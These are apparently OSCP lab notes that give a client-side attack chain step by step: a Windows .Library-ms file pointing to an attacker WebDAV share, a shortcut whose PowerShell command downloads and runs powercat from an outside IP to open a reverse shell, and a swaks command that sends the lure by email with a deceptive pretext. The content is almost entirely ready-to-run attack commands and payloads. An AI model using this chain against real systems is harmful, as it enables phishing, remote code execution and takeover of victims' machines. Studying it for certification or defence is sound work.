🧪
Client Side Attacks Code Execution Via Windows Library
Notes from oscp.adot8.com — cool.
#cool#adot8
source · oscp.adot8.com · cool/client-side-attacks_code-execution-via-windows-library ↗Code execution via Windows Library
code
01gobuster dir -w ~/opt/wordlists/directories1.txt -u http://192.168.160.199 -x pdf,txt -t 100Start up WebDav share
code
01wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/adot8/webdav/Create a config.Library-ms file
code
01<?xml version="1.0" encoding="UTF-8"?>02<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">03<name>@windows.storage.dll,-34582</name>04<version>6</version>05<isLibraryPinned>true</isLibraryPinned>06<iconReference>imageres.dll,-1003</iconReference>07<templateInfo>08<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>09</templateInfo>10<searchConnectorDescriptionList>11<searchConnectorDescription>12<isDefaultSaveLocation>true</isDefaultSaveLocation>13<isSupported>false</isSupported>14<simpleLocation>15<url>http://192.168.45.173 </url>16</simpleLocation>17</searchConnectorDescription>18</searchConnectorDescriptionList>19</libraryDescription>Create a new shortcut and name as automatic_configuration
code
01powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1');powercat -c 192.168.45.173 -p 1337 -e powershell"Move the shortcut into the webdav root folder and get pretext to get the user to open it
Send email
swaks --to bob@adot8.com --from maildmz@relia.com --header 'Subject: Bad email!' --body "I've attached the problematic mail." --server 192.168.166.189 --attach @config.Library-ms --auth-user 'john@adot8.com' --auth-password 'abc123'